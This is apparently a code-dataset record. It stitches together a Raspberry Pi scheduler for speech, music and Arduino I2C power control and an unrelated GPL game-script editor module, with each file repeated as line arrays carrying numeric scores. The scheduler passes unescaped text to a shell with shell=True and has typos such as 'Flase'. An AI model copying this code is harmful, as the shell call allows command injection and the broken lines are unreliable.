datetime.datetime.now() day = now.weekday() if (timing['type']=='weekday' and day in {0,1,2,3,4}) \ or (timing['type']=='weekend' and day in {5,6}) \ or (timing['type']=='everyday'): hour,min = timing['value'].split(':') target = datetime.datetime(now.year,now.month,now.day,int(hour),int(min),0) return self.check_basic_timer(timing,now,target) elif timing['type']=='onshot': target = datetimec.strptime(timing['value'], '%Y/%m/%d %H:%M:%S') print("onshot",target) return self.check_basic_timer(timing,now,target) return False def check_entry(self,entry): if entry['status'] == 'done': return fire = self.judge_timing(entry['timing']) if fire == False: return elif fire == "done": entry['status'] = 'done' return if entry['type']=='power': #power control self.check_power_control(entry) elif entry['type']=='speech': #speech control self.check_speech_control(entry) elif entry['type']=='music': #speech control self.check_music_control(entry) entry['status'] = 'done' def update(self): for entry in self.data: self.check_entry(self.data[entry]) return def get_wakeup_timer_request(self): requests=[] for entry in self.data: d = self.data[entry] if d['action'] =='wakeup' and d['type']=='power': requests.append(d['timing']['value'].split(":")) return requests class ArduinoTimer(): ARDUINO_I2C_ADDR=0x10 CMD_SET_WAKUP_TIMER01A = 0x11 CMD_SET_WAKUP_TIMER01B = 0x12 CMD_SET_WAKUP_TIMER02A = 0x21 CMD_SET_WAKUP_TIMER02B = 0x22 CMD_CLEAR_TIMER = 0x40 CMD_SHUTDOWN_NOW = 0xFF def __init__(self,motion_obj): self.conf = ap_music_server_conf.MusicServerConfig().get_conf() self.i2c = smbus.SMBus(1) self.first_setting = False self.motion = motion_obj self.schedule = Schedule(self.motion,self) return @classmethod def datetime_to_epoch(self,d): return int(timec.mktime(d.timetuple())) @classmethod def epoch_to_datetime(self,epoch): return datetime(*timec.localtime(epoch)[:6]) def send_i2c_command(self,cmd,data): for num in range(1,5): try: self.i2c.write_block_data(self.ARDUINO_I2C_ADDR,cmd,data) except IOError: logging.debug("I2C IOerror in timer in Arduino communication > Retry") timec.sleep(num) else: logging.debug("I2C send OK to Arduino") return True return Flase def set_timer(self,time): target = self.datetime_to_epoch(time) diff = target - int(timec.time()) data1=[0,0] data2=[0,0] data1[0] = int((diff & 0xFF000000)>>24) data1[1] = (diff & 0x00FF0000)>>16 data2[0] = (diff & 0x0000FF00)>>8 data2[1] = diff & 0x000000FF if diff<0: return cmd = self.CMD_SET_WAKUP_TIMER01A logging.debug("cmd="+str(cmd)+" diff="+str(diff)) logging.debug(data1) self.send_i2c_command(cmd,data1) timec.sleep(0.05) cmd = self.CMD_SET_WAKUP_TIMER01B logging.debug("cmd="+str(cmd)+" diff="+str(diff)) logging.debug(data2) self.send_i2c_command(cmd,data2) return def set_cmd(self,cmd,time): data=[0,0] logging.debug("cmd="+str(cmd)) self.send_i2c_command(cmd,data) return def send_shutdown_request(self): logging.debug('send_shutdown_request') self.set_cmd(self.CMD_SHUTDOWN_NOW,datetime.datetime.now()) return def send_cleartimer_request(self): logging.debug('send_cleartimer_request') self.set_cmd(self.CMD_CLEAR_TIMER,datetime.datetime.now()) return def get_time(self,hour,min): now = datetime.datetime.now() tomorrow = now + datetime.timedelta(days=1) t = datetime.datetime(now.year,now.month,now.day,hour,min,0) if t < now: t = datetime.datetime(tomorrow.year,tomorrow.month,tomorrow.day,hour,min,0) return t def set_timer_once(self): if self.first_setting: return self.send_cleartimer_request() logging.debug("set wake up timer") requests = self.schedule.get_wakeup_timer_request() for req in requests: t1 = self.get_time(int(req[0]),int(req[1])) logging.debug(t1) self.set_timer(t1) self.first_setting = True return def check_event(self): mov_act = self.motion.get_latest_status() self.schedule.update() return def reload_schedule(self): logging.debug("reload_schedule") self.schedule = Schedule(self.motion,self) self.first_setting=False self.set_timer_once() def p(self): print("testestet")
[ "#!/usr/bin/python\n", "# -*- coding: utf-8 -*-\n", "\n", "import logging\n", "import smbus\n", "import time as timec\n", "import datetime\n", "from datetime import datetime as datetimec\n", "import json\n", "import urllib\n", "import pprint\n", "import sys\n", "import subprocess\n", "import requests\n", "import feedparser\n", "\n", "import ap_music_server_conf\n", "import ap_music\n", "\n", "class Yukkuri:\n", "\tdef __init__(self):\n", "\t\tself.conf = ap_music_server_conf.MusicServerConfig().get_conf()\n", "\t\treturn\n", "\n", "\tdef send_cmmand(self,cmd):\n", "\t\tp = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)\n", "\t\tstdout_data, stderr_data = p.communicate()\n", "\t\treturn stdout_data\n", "\n", "\tdef speech(self,text):\n", "\t\tcmd = self.conf['speech_api'] % text\n", "\t\tlogging.debug(cmd)\n", "\t\tself.send_cmmand(cmd)\n", "\n", "\tdef dayofweek_info_speech(self):\n", "\t\tweekday = datetime.datetime.now().weekday()\n", "\t\tfor d in self.conf['dayofweek_info']:\n", "\t\t\tif d == str(weekday):\n", "\t\t\t\tself.speech(self.conf['dayofweek_info'][d])\n", "\n", "\tdef wether_speech(self):\n", "\t\turl = 'http://weather.livedoor.com/forecast/webservice/json/v1'\n", "\t\tpayload = { 'city' : self.conf['city_id'] }\n", "\t\tdata = requests.get(url, params = payload).json()\n", "\t\t\n", "\t\ttext=\"\"\n", "\t\ttry:\n", "\t\t\ttitle = data['title']+u'をお伝えします。'\n", "\t\t\n", "\t\t\ttext = title\n", "\t\t\tfor weather in data[\"forecasts\"]:\n", "\t\t\t\tdate = weather['date']\n", "\t\t\t\td = date.encode().split(\"-\")\n", "\t\t\t\ttext += str(int(d[1])) +u\"月\"+ str(int(d[2]))+ u'日、' + weather['dateLabel'] + u'は' + weather['telop'] + u'です。'\n", "\n", "\t\t\td = data[\"forecasts\"][0]['date'].encode().split(\"-\")\n", "\t\t\tmax = data[\"forecasts\"][0]['temperature']['max']['celsius']\n", "\t\t\ttext += u'今日、'+str(int(d[1])) +u\"月\"+ str(int(d[2]))+ u'日、の最高気温は、%s 度です。' % max\n", "\t\t\tmin = data[\"forecasts\"][0]['temperature']['min']['celsius']\n", "\t\t\ttext += u'最低気温は、%s 度です。' % min\n", "\t\texcept TypeError:\n", "\t\t\tprint(\"No temp in data\")\n", "\t\tself.speech(text)\n", "\n", "\tdef rss_speech(self,rss_url):\n", "\t\tfeed = feedparser.parse(rss_url)\n", "\t\tfor e in feed.entries:\n", "\t\t\tself.speech( e.title )\n", "\n", "\tdef play_welcome_msg(self):\n", "\t\tself.speech(self.conf['welcome_msg'])\n", "\n", "\n", "class Schedule:\n", "\tdef __init__(self,motion_obj,timer_obj):\n", "\t\tself.conf = ap_music_server_conf.MusicServerConfig().get_conf()\n", "\t\tenvfile = open(self.conf['schedule_file_path'], 'r')\n", "\t\tself.data = json.load(envfile)\n", "\t\tenvfile.close()\n", "\t\t\n", "\t\tself.timer = timer_obj\n", "\t\tself.motion = motion_obj\n", "\t\tself.yukkuri = Yukkuri()\n", "\t\tself.music = ap_music.ApMusic()\n", "\t\t\n", "\t\treturn\n", "\n", "\tdef check_ex(self,timing):\n", "\t\tif timing.get('excond')=='movement':\n", "\t\t\t#if movement is active:\n", "\t\t\tprint(\"excond\",self.motion.get_latest_status())\n", "\t\t\tif self.motion.get_latest_status() > 2:\n", "\t\t\t\treturn True\n", "\t\t\treturn False\n", "\t\t\t\n", "\t\t#movement is not set\n", "\t\treturn True\n", "\t\t\n", "\tdef check_power_control(self,entry):\n", "\t\tif entry['status']=='done':\n", "\t\t\treturn\n", "\t\tif entry['action']=='shutdown':\n", "\t\t\tlogging.debug(\"**************************\")\n", "\t\t\tlogging.debug(\"*** shutdown RasPi now ***\")\n", "\t\t\tlogging.debug(\"**************************\")\n", "\t\t\tself.timer.send_shutdown_request()\n", "\t\t\tentry['status']='done'\n", "\t\t\treturn\n", "\t\treturn\n", "\n", "\tdef check_speech_control(self,entry):\n", "\t\tif entry['action'] == \"speech\":\n", "\t\t\tself.yukkuri.speech(entry['content'])\n", "\t\telif entry['action'] == \"speech_weather\":\n", "\t\t\tself.yukkuri.wether_speech()\n", "\t\treturn\n", "\n", "\tdef check_music_control(self,entry):\n", "\t\tif entry['action'] == \"play\":\n", "\t\t\tself.music.play_item(entry['content'])\n", "\t\telif entry['action'] == \"stop\":\n", "\t\t\tself.music.stop()\n", "\t\treturn\n", "\n", "\tdef check_basic_timer(self,timing,now,target):\n", "\t\tt1 = ArduinoTimer.datetime_to_epoch(now)\n", "\t\tt2 = ArduinoTimer.datetime_to_epoch(target)\n", "\t\t\n", "\t\tif t1 > t2:\n", "\t\t\tif abs(t1-t2) < 60*1: #allow 60sec diff\n", "\t\t\t\treturn self.check_ex(timing)\n", "\t\t\telse:\n", "\t\t\t\tif timing.get('excond')=='movement' and abs(t1-t2) < 60*60*3:\n", "\t\t\t\t\treturn False\n", "\t\t\t\treturn \"done\"\n", "\t\treturn False\t\n", "\t\n", "\tdef judge_timing(self,timing):\n", "\t\tnow = datetime.datetime.now()\n", "\t\tday = now.weekday()\n", "\t\t\n", "\t\tif (timing['type']=='weekday' and day in {0,1,2,3,4}) \\\n", "\t\t or (timing['type']=='weekend' and day in {5,6}) \\\n", "\t\t or (timing['type']=='everyday'):\n", "\t\t\thour,min = timing['value'].split(':')\n", "\t\t\ttarget = datetime.datetime(now.year,now.month,now.day,int(hour),int(min),0)\n", "\t\t\treturn self.check_basic_timer(timing,now,target)\n", "\t\telif timing['type']=='onshot':\n", "\t\t\ttarget = datetimec.strptime(timing['value'], '%Y/%m/%d %H:%M:%S')\n", "\t\t\tprint(\"onshot\",target)\n", "\t\t\treturn self.check_basic_timer(timing,now,target)\n", "\t\treturn False\n", "\t\t\n", "\tdef check_entry(self,entry):\n", "\t\tif entry['status'] == 'done':\n", "\t\t\treturn\n", "\t\t\t\n", "\t\tfire = self.judge_timing(entry['timing'])\n", "\t\tif fire == False:\n", "\t\t\treturn\n", "\t\telif fire == \"done\":\n", "\t\t\tentry['status'] = 'done'\n", "\t\t\treturn\n", "\n", "\t\tif entry['type']=='power': #power control\n", "\t\t\tself.check_power_control(entry)\n", "\t\telif entry['type']=='speech': #speech control\n", "\t\t\tself.check_speech_control(entry)\n", "\t\telif entry['type']=='music': #speech control\n", "\t\t\tself.check_music_control(entry)\n", "\t\tentry['status'] = 'done'\n", "\t\t\n", "\tdef update(self):\n", "\t\tfor entry in self.data:\n", "\t\t\tself.check_entry(self.data[entry])\n", "\t\treturn\n", "\t\n", "\tdef get_wakeup_timer_request(self):\n", "\t\trequests=[]\n", "\t\tfor entry in self.data:\n", "\t\t\td = self.data[entry]\n", "\t\t\tif d['action'] =='wakeup' and d['type']=='power':\n", "\t\t\t\trequests.append(d['timing']['value'].split(\":\"))\n", "\t\treturn requests\n", "\n", "class ArduinoTimer():\n", "\tARDUINO_I2C_ADDR=0x10\n", "\tCMD_SET_WAKUP_TIMER01A = 0x11\n", "\tCMD_SET_WAKUP_TIMER01B = 0x12\n", "\tCMD_SET_WAKUP_TIMER02A = 0x21\n", "\tCMD_SET_WAKUP_TIMER02B = 0x22\n", "\tCMD_CLEAR_TIMER = 0x40\n", "\tCMD_SHUTDOWN_NOW = 0xFF\n", "\n", "\tdef __init__(self,motion_obj):\n", "\t\tself.conf = ap_music_server_conf.MusicServerConfig().get_conf()\n", "\t\tself.i2c = smbus.SMBus(1)\n", "\t\tself.first_setting = False\n", "\t\tself.motion = motion_obj\n", "\t\tself.schedule = Schedule(self.motion,self)\n", "\t\treturn\n", "\t\t\n", "\t@classmethod\n", "\tdef datetime_to_epoch(self,d):\n", "\t\treturn int(timec.mktime(d.timetuple()))\n", "\n", "\t@classmethod\n", "\tdef epoch_to_datetime(self,epoch):\n", "\t\treturn datetime(*timec.localtime(epoch)[:6])\n", "\t\n", "\tdef send_i2c_command(self,cmd,data):\n", "\t\tfor num in range(1,5):\n", "\t\t\ttry:\n", "\t\t\t\tself.i2c.write_block_data(self.ARDUINO_I2C_ADDR,cmd,data)\n", "\t\t\texcept IOError:\n", "\t\t\t\tlogging.debug(\"I2C IOerror in timer in Arduino communication > Retry\")\n", "\t\t\t\ttimec.sleep(num)\n", "\t\t\telse:\n", "\t\t\t\tlogging.debug(\"I2C send OK to Arduino\")\n", "\t\t\t\treturn True\n", "\t\treturn Flase\n", "\t\n", "\tdef set_timer(self,time):\n", "\t\ttarget = self.datetime_to_epoch(time)\n", "\t\tdiff = target - int(timec.time())\n", "\t\tdata1=[0,0]\n", "\t\tdata2=[0,0]\n", "\t\tdata1[0] = int((diff & 0xFF000000)>>24)\n", "\t\tdata1[1] = (diff & 0x00FF0000)>>16\n", "\t\tdata2[0] = (diff & 0x0000FF00)>>8\n", "\t\tdata2[1] = diff & 0x000000FF\n", "\t\t\n", "\t\tif diff<0:\n", "\t\t\treturn\n", "\t\tcmd = self.CMD_SET_WAKUP_TIMER01A\n", "\t\tlogging.debug(\"cmd=\"+str(cmd)+\" diff=\"+str(diff))\n", "\t\tlogging.debug(data1)\n", "\t\tself.send_i2c_command(cmd,data1)\n", "\t\ttimec.sleep(0.05)\n", "\t\tcmd = self.CMD_SET_WAKUP_TIMER01B\n", "\t\tlogging.debug(\"cmd=\"+str(cmd)+\" diff=\"+str(diff))\n", "\t\tlogging.debug(data2)\n", "\t\tself.send_i2c_command(cmd,data2)\n", "\t\treturn\n", "\n", "\tdef set_cmd(self,cmd,time):\n", "\t\tdata=[0,0]\n", "\t\tlogging.debug(\"cmd=\"+str(cmd))\n", "\t\tself.send_i2c_command(cmd,data)\n", "\t\treturn\n", "\t\n", "\tdef send_shutdown_request(self):\n", "\t\tlogging.debug('send_shutdown_request')\n", "\t\tself.set_cmd(self.CMD_SHUTDOWN_NOW,datetime.datetime.now())\n", "\t\treturn\n", "\n", "\tdef send_cleartimer_request(self):\n", "\t\tlogging.debug('send_cleartimer_request')\n", "\t\tself.set_cmd(self.CMD_CLEAR_TIMER,datetime.datetime.now())\n", "\t\treturn\n", "\n", "\tdef get_time(self,hour,min):\n", "\t\tnow = datetime.datetime.now()\n", "\t\ttomorrow = now + datetime.timedelta(days=1)\n", "\t\tt = datetime.datetime(now.year,now.month,now.day,hour,min,0)\n", "\t\tif t < now:\n", "\t\t\tt = datetime.datetime(tomorrow.year,tomorrow.month,tomorrow.day,hour,min,0)\n", "\t\treturn t\n", "\t\n", "\tdef set_timer_once(self):\n", "\t\tif self.first_setting:\n", "\t\t\treturn\n", "\t\tself.send_cleartimer_request()\n", "\t\tlogging.debug(\"set wake up timer\")\n", "\t\trequests = self.schedule.get_wakeup_timer_request()\n", "\t\tfor req in requests:\n", "\t\t\tt1 = self.get_time(int(req[0]),int(req[1]))\n", "\t\t\tlogging.debug(t1)\n", "\t\t\tself.set_timer(t1)\n", "\n", "\t\tself.first_setting = True\n", "\t\treturn\n", "\n", "\tdef check_event(self):\n", "\t\tmov_act = self.motion.get_latest_status()\n", "\t\t\n", "\t\tself.schedule.update()\n", "\t\treturn\n", "\r\n", "\tdef reload_schedule(self):\r\n", "\t\tlogging.debug(\"reload_schedule\")\r\n", "\t\tself.schedule = Schedule(self.motion,self)\r\n", "\t\tself.first_setting=False\r\n", "\t\tself.set_timer_once()\r\n", "\r\n", "\tdef p(self):\r\n", "\t\tprint(\"testestet\")" ]
[ 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.06666666666666667, 0.047619047619047616, 0.015151515151515152, 0.1111111111111111, 0, 0.07142857142857142, 0.022727272727272728, 0.022222222222222223, 0.047619047619047616, 0, 0.08333333333333333, 0.02564102564102564, 0.047619047619047616, 0.041666666666666664, 0, 0.029411764705882353, 0.021739130434782608, 0.025, 0.04, 0.020833333333333332, 0, 0.038461538461538464, 0.015151515151515152, 0.08695652173913043, 0.057692307692307696, 0.6666666666666666, 0.2, 0.14285714285714285, 0.02702702702702703, 0.6666666666666666, 0.0625, 0.02702702702702703, 0.037037037037037035, 0.030303030303030304, 0.043859649122807015, 0, 0.017857142857142856, 0.015873015873015872, 0.06097560975609756, 0.015873015873015872, 0.029411764705882353, 0.05, 0.03571428571428571, 0.05, 0, 0.06451612903225806, 0.02857142857142857, 0.04, 0.11538461538461539, 0, 0.034482758620689655, 0.025, 0, 0, 0, 0.07142857142857142, 0.015151515151515152, 0.01818181818181818, 0.030303030303030304, 0.05555555555555555, 0.6666666666666666, 0.04, 0.037037037037037035, 0.037037037037037035, 0.029411764705882353, 0.6666666666666666, 0.1111111111111111, 0, 0.07142857142857142, 0.05128205128205128, 0.07407407407407407, 0.0392156862745098, 0.023255813953488372, 0.0625, 0.0625, 0.5, 0.08695652173913043, 0.07142857142857142, 0.6666666666666666, 0.05263157894736842, 0.06666666666666667, 0.1, 0.058823529411764705, 0.02127659574468085, 0.02127659574468085, 0.02127659574468085, 0.02631578947368421, 0.07692307692307693, 0.1, 0.1111111111111111, 0, 0.05128205128205128, 0.029411764705882353, 0.024390243902439025, 0.022727272727272728, 0.03125, 0.1111111111111111, 0, 0.05263157894736842, 0.03125, 0.023809523809523808, 0.029411764705882353, 0.047619047619047616, 0.1111111111111111, 0, 0.08333333333333333, 0.023255813953488372, 0.021739130434782608, 0.6666666666666666, 0.07142857142857142, 0.06976744186046512, 0.030303030303030304, 0.1111111111111111, 0.030303030303030304, 0.05555555555555555, 0.05555555555555555, 0.125, 1, 0.0625, 0.03125, 0.045454545454545456, 0.6666666666666666, 0.11475409836065574, 0.07272727272727272, 0.07894736842105263, 0.04878048780487805, 0.0759493670886076, 0.057692307692307696, 0.06060606060606061, 0.014492753623188406, 0.07692307692307693, 0.057692307692307696, 0.06666666666666667, 0.6666666666666666, 0.06666666666666667, 0.03125, 0.1, 0.5, 0.022727272727272728, 0.1, 0.1, 0.043478260869565216, 0.03571428571428571, 0.1, 0, 0.09090909090909091, 0.02857142857142857, 0.08333333333333333, 0.027777777777777776, 0.0851063829787234, 0.02857142857142857, 0.037037037037037035, 0.6666666666666666, 0.05263157894736842, 0.038461538461538464, 0.02631578947368421, 0.1111111111111111, 1, 0.02702702702702703, 0.14285714285714285, 0.038461538461538464, 0.041666666666666664, 0.05660377358490566, 0.018867924528301886, 0.05555555555555555, 0, 0.045454545454545456, 0.08695652173913043, 0.058823529411764705, 0.058823529411764705, 0.058823529411764705, 0.058823529411764705, 0.06060606060606061, 0.06060606060606061, 0, 0.0625, 0.015151515151515152, 0.03571428571428571, 0.034482758620689655, 0.037037037037037035, 0.044444444444444446, 0.1111111111111111, 0.6666666666666666, 0.07142857142857142, 0.0625, 0.023809523809523808, 0, 0.07142857142857142, 0.05555555555555555, 0.02127659574468085, 1, 0.07894736842105263, 0.08, 0.125, 0.04838709677419355, 0.05263157894736842, 0.013333333333333334, 0.047619047619047616, 0.1111111111111111, 0.022727272727272728, 0.0625, 0.06666666666666667, 1, 0.07407407407407407, 0.025, 0.027777777777777776, 0.21428571428571427, 0.21428571428571427, 0.047619047619047616, 0.05405405405405406, 0.05555555555555555, 0.0625, 0.6666666666666666, 0.15384615384615385, 0.1, 0.027777777777777776, 0.018867924528301886, 0.043478260869565216, 0.05714285714285714, 0.05, 0.027777777777777776, 0.018867924528301886, 0.043478260869565216, 0.05714285714285714, 0.1111111111111111, 0, 0.10344827586206896, 0.23076923076923078, 0.030303030303030304, 0.058823529411764705, 0.1111111111111111, 1, 0.029411764705882353, 0.024390243902439025, 0.03225806451612903, 0.1111111111111111, 0, 0.027777777777777776, 0.023255813953488372, 0.03278688524590164, 0.1111111111111111, 0, 0.1, 0.03125, 0.021739130434782608, 0.09523809523809523, 0.07142857142857142, 0.0759493670886076, 0.09090909090909091, 1, 0.037037037037037035, 0.04, 0.1, 0.030303030303030304, 0.02702702702702703, 0.018518518518518517, 0.043478260869565216, 0.0425531914893617, 0.047619047619047616, 0.045454545454545456, 0, 0.03571428571428571, 0.1111111111111111, 0, 0.041666666666666664, 0.022727272727272728, 0.6666666666666666, 0.04, 0.1111111111111111, 0, 0.034482758620689655, 0.027777777777777776, 0.043478260869565216, 0.07142857142857142, 0.04, 0, 0.06666666666666667, 0.1 ]
297
0.095472
false
################################################################################ ### Copyright © 2012-2013 BlackDragonHunt ### Copyright © 2012-2013 /a/nonymous scanlations ### ### This file is part of the Super Duper Script Editor. ### ### The Super Duper Script Editor is free software: you can redistribute it ### and/or modify it under the terms of the GNU General Public License as ### published by the Free Software Foundation, either version 3 of the License, ### or (at your option) any later version. ### ### The Super Duper Script Editor is distributed in the hope that it will be ### useful, but WITHOUT ANY WARRANTY; without even the implied warranty of ### MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the ### GNU General Public License for more details. ### ### You should have received a copy of the GNU General Public License ### along with the Super Duper Script Editor. ### If not, see <http://www.gnu.org/licenses/>. ################################################################################ from bitstring import ConstBitStream import os from wrd.ops import * from wrd.bin import to_bin, from_bin from wrd.python import to_python, from_python from wrd.scene import to_scene_info ################################################################################ ### A meta class for easy access to the relevant wrd parsing/converting fns, ### plus some helper functions for use in the editor. ################################################################################ class WrdFile: def __init__(self, filename = None): self.commands = [] if not filename == None: if os.path.splitext(filename)[1].lower() == ".py": self.load_python(filename) else: self.load_bin(filename) ############################################################################## ### Binary ############################################################################## def load_bin(self, filename): data = ConstBitStream(filename = filename) self.from_bin(data) def save_bin(self, filename): data = self.to_bin() with open(filename, "wb") as f: data.tofile(f) def from_bin(self, data): self.commands = from_bin(data) def to_bin(self): return to_bin(self.commands) ############################################################################## ### Python ############################################################################## def load_python(self, filename): script = "" with open(filename, "rb") as f: script = f.read() self.from_python(script) def save_python(self, filename): script = self.to_python() with open(filename, "wb") as f: f.write(script) def from_python(self, script): self.commands = from_python(script) def to_python(self): return to_python(self.commands) ############################################################################## ### SceneInfo ############################################################################## def to_scene_info(self): return to_scene_info(self.commands) ############################################################################## ### Helper functions ############################################################################## def num_lines(self): lines = 0 for op, params in self.commands: if op == WRD_SHOW_LINE: lines += 1 return lines def max_line(self): max = 0 for op, params in self.commands: if op == WRD_SHOW_LINE and params["line"] > max: max = params["line"] return max def insert_line_after(self, insert_after): self.insert_line(insert_after, before = False) def insert_line_before(self, insert_before): self.insert_line(insert_before, before = True) ###################################################################### ### Inserts a new line relative to the target line. ###################################################################### def insert_line(self, target, before = False): found = False new_line = self.max_line() + 1 index = 0 for i, (op, params) in enumerate(self.commands): if op == WRD_SHOW_LINE and params["line"] == target: found = True # If we're inserting before a line, then just take this index and go. if before: index = i break # If we're inserting after a line, though, wait until we find the nearest # wait-for-input command and insert after that. if op == WRD_WAIT_INPUT and found: index = i + 1 break if not found: raise Exception("Could not insert line. Reference line %d does not exist." % target) # Insert our command backwards so we don't have to worry about index shifting. self.commands.insert(index, (WRD_WAIT_INPUT, {})) self.commands.insert(index, (WRD_WAIT_FRAME, {"frames": 1})) self.commands.insert(index, (WRD_SHOW_LINE, {"line": new_line})) return new_line def main(): import glob import time # wrds = glob.iglob("wrds-sdr2/e00*.wrd") # pys = glob.iglob("wrds-sdr2/e00*.py") wrds = glob.iglob("wip/wrds-sdr2/e01*.wrd") # pys = glob.iglob("wip/wrds-sdr2/*.py") wrd = WrdFile() # start = time.time() # for filename in wrds: # wrd.load_bin(filename) # print "Took", time.time() - start, "seconds to parse wrds." # start = time.time() # for filename in pys: # wrd.load_python(filename) # wrd_file = os.path.splitext(filename)[0]# + ".wrd" # wrd.save_bin(wrd_file) # print "Took", time.time() - start, "seconds to parse pys." # return for filename in wrds: print filename orig = ConstBitStream(filename = filename) test = WrdFile(filename) # if test.num_lines() > 0: # script = test.to_python() # with open(filename + "-1.py", "wb") as f: # f.write(script) # test.insert_line(0) # script = test.to_python() # with open(filename + "-2.py", "wb") as f: # f.write(script) script = test.to_python() with open(filename + ".py", "wb") as f: f.write(script) test.from_python(script) out = test.to_bin() if not orig == out: # print filename print " Didn't match!" with open(filename + "-out", "wb") as f: out.tofile(f) with open(filename + ".py", "wb") as f: f.write(script) if __name__ == "__main__": main() ### EOF ###
[ "################################################################################\n", "### Copyright © 2012-2013 BlackDragonHunt\n", "### Copyright © 2012-2013 /a/nonymous scanlations\n", "### \n", "### This file is part of the Super Duper Script Editor.\n", "### \n", "### The Super Duper Script Editor is free software: you can redistribute it\n", "### and/or modify it under the terms of the GNU General Public License as\n", "### published by the Free Software Foundation, either version 3 of the License,\n", "### or (at your option) any later version.\n", "### \n", "### The Super Duper Script Editor is distributed in the hope that it will be\n", "### useful, but WITHOUT ANY WARRANTY; without even the implied warranty of\n", "### MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n", "### GNU General Public License for more details.\n", "### \n", "### You should have received a copy of the GNU General Public License\n", "### along with the Super Duper Script Editor.\n", "### If not, see <http://www.gnu.org/licenses/>.\n", "################################################################################\n", "\n", "from bitstring import ConstBitStream\n", "import os\n", "\n", "from wrd.ops import *\n", "\n", "from wrd.bin import to_bin, from_bin\n", "from wrd.python import to_python, from_python\n", "from wrd.scene import to_scene_info\n", "\n", "################################################################################\n", "### A meta class for easy access to the relevant wrd parsing/converting fns,\n", "### plus some helper functions for use in the editor.\n", "################################################################################\n", "class WrdFile:\n", " def __init__(self, filename = None):\n", " \n", " self.commands = []\n", " \n", " if not filename == None:\n", " if os.path.splitext(filename)[1].lower() == \".py\":\n", " self.load_python(filename)\n", " else:\n", " self.load_bin(filename)\n", " \n", " ##############################################################################\n", " ### Binary\n", " ##############################################################################\n", " def load_bin(self, filename):\n", " data = ConstBitStream(filename = filename)\n", " self.from_bin(data)\n", " \n", " def save_bin(self, filename):\n", " data = self.to_bin()\n", " with open(filename, \"wb\") as f:\n", " data.tofile(f)\n", " \n", " def from_bin(self, data):\n", " self.commands = from_bin(data)\n", " \n", " def to_bin(self):\n", " return to_bin(self.commands)\n", " \n", " ##############################################################################\n", " ### Python\n", " ##############################################################################\n", " def load_python(self, filename):\n", " script = \"\"\n", " \n", " with open(filename, \"rb\") as f:\n", " script = f.read()\n", " \n", " self.from_python(script)\n", " \n", " def save_python(self, filename):\n", " script = self.to_python()\n", " with open(filename, \"wb\") as f:\n", " f.write(script)\n", " \n", " def from_python(self, script):\n", " self.commands = from_python(script)\n", " \n", " def to_python(self):\n", " return to_python(self.commands)\n", " \n", " ##############################################################################\n", " ### SceneInfo\n", " ##############################################################################\n", " def to_scene_info(self):\n", " return to_scene_info(self.commands)\n", " \n", " ##############################################################################\n", " ### Helper functions\n", " ##############################################################################\n", " def num_lines(self):\n", " lines = 0\n", " \n", " for op, params in self.commands:\n", " if op == WRD_SHOW_LINE:\n", " lines += 1\n", " \n", " return lines\n", " \n", " def max_line(self):\n", " max = 0\n", " \n", " for op, params in self.commands:\n", " if op == WRD_SHOW_LINE and params[\"line\"] > max:\n", " max = params[\"line\"]\n", " \n", " return max\n", " \n", " def insert_line_after(self, insert_after):\n", " self.insert_line(insert_after, before = False)\n", " \n", " def insert_line_before(self, insert_before):\n", " self.insert_line(insert_before, before = True)\n", " \n", " ######################################################################\n", " ### Inserts a new line relative to the target line.\n", " ######################################################################\n", " def insert_line(self, target, before = False):\n", " \n", " found = False\n", " new_line = self.max_line() + 1\n", " index = 0\n", " \n", " for i, (op, params) in enumerate(self.commands):\n", " if op == WRD_SHOW_LINE and params[\"line\"] == target:\n", " found = True\n", " \n", " # If we're inserting before a line, then just take this index and go.\n", " if before:\n", " index = i\n", " break\n", " \n", " # If we're inserting after a line, though, wait until we find the nearest\n", " # wait-for-input command and insert after that.\n", " if op == WRD_WAIT_INPUT and found:\n", " index = i + 1\n", " break\n", " \n", " if not found:\n", " raise Exception(\"Could not insert line. Reference line %d does not exist.\" % target)\n", " \n", " # Insert our command backwards so we don't have to worry about index shifting.\n", " self.commands.insert(index, (WRD_WAIT_INPUT, {}))\n", " self.commands.insert(index, (WRD_WAIT_FRAME, {\"frames\": 1}))\n", " self.commands.insert(index, (WRD_SHOW_LINE, {\"line\": new_line}))\n", " \n", " return new_line\n", "\n", "def main():\n", " \n", " import glob\n", " import time\n", "\n", " # wrds = glob.iglob(\"wrds-sdr2/e00*.wrd\")\n", " # pys = glob.iglob(\"wrds-sdr2/e00*.py\")\n", " wrds = glob.iglob(\"wip/wrds-sdr2/e01*.wrd\")\n", " # pys = glob.iglob(\"wip/wrds-sdr2/*.py\")\n", " \n", " wrd = WrdFile()\n", " \n", " # start = time.time()\n", " # for filename in wrds:\n", " # wrd.load_bin(filename)\n", " # print \"Took\", time.time() - start, \"seconds to parse wrds.\"\n", " \n", " # start = time.time()\n", " # for filename in pys:\n", " # wrd.load_python(filename)\n", " # wrd_file = os.path.splitext(filename)[0]# + \".wrd\"\n", " # wrd.save_bin(wrd_file)\n", " # print \"Took\", time.time() - start, \"seconds to parse pys.\"\n", " \n", " # return\n", " \n", " for filename in wrds:\n", " \n", " print filename\n", " \n", " orig = ConstBitStream(filename = filename)\n", " test = WrdFile(filename)\n", " \n", " # if test.num_lines() > 0:\n", " # script = test.to_python()\n", " # with open(filename + \"-1.py\", \"wb\") as f:\n", " # f.write(script)\n", " \n", " # test.insert_line(0)\n", " # script = test.to_python()\n", " # with open(filename + \"-2.py\", \"wb\") as f:\n", " # f.write(script)\n", " \n", " script = test.to_python()\n", " with open(filename + \".py\", \"wb\") as f:\n", " f.write(script)\n", " test.from_python(script)\n", " out = test.to_bin()\n", " \n", " if not orig == out:\n", " # print filename\n", " print \" Didn't match!\"\n", " \n", " with open(filename + \"-out\", \"wb\") as f:\n", " out.tofile(f)\n", " \n", " with open(filename + \".py\", \"wb\") as f:\n", " f.write(script)\n", " \n", "if __name__ == \"__main__\":\n", " main()\n", "\n", "### EOF ###" ]
